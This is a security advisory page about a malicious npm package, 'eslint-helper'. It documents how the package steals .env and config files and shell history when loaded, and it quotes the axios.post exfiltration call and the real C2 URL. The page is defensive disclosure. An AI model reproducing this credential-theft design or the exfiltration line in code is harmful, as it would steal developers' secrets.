VDB

GCVE-110-OSM-2026-6310

GCVE-110-OSM-2026-6310
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published June 19, 2026
Steals credentials and shell history at require-time by recursively scanning process.cwd() for config files and secrets then collecting bash/zsh/fish/PowerShell history and POSTing each file prefixed with a victim fingerprint to the Vercel-hosted C2 at https://vercel-backend-five-vert.vercel.app/api/v1 with the C2 URL and all file target patterns concealed via base64 encoding. **Trigger**: require-time — index.js `from_str()` entry point fires on module load with no install hook. **Filesystem scan**: `_k9b2x()` recursively traverses `process.cwd()` collecting files matching: `id.json`, `config.toml`, `Config.toml`, `config.json`, `env`, `.env`. **Shell history**: `_gsh()` reads `~/.bash_history`, `~/.zsh_history`, fish history, and PowerShell PSReadLine; also runs `execSync('bash -c history')` and `execSync("zsh -c 'fc -l -1000'")`. **Fingerprinting**: `_q8w3rData()` obtains local IP via UDP socket connect to 8.8.8.8:80 (no data sent); prepends `$USER@$LOCAL_IP\n` to each file before upload. **Exfiltration**: `axios.post(API_URL, payload, { 'Content-Type': 'application/octet-stream', 'Content-Disposition': 'attachment; filename="{basename}"' })` uploads to https://vercel-backend-five-vert.vercel.app/api/v1 **Obfuscation**: C2 URL and file target patterns stored as base64-encoded string constants decoded at runtime via `decodeStr()`.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowneslint-helperall (affected), 4.0.2 (affected)

References

advisory
vendor

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›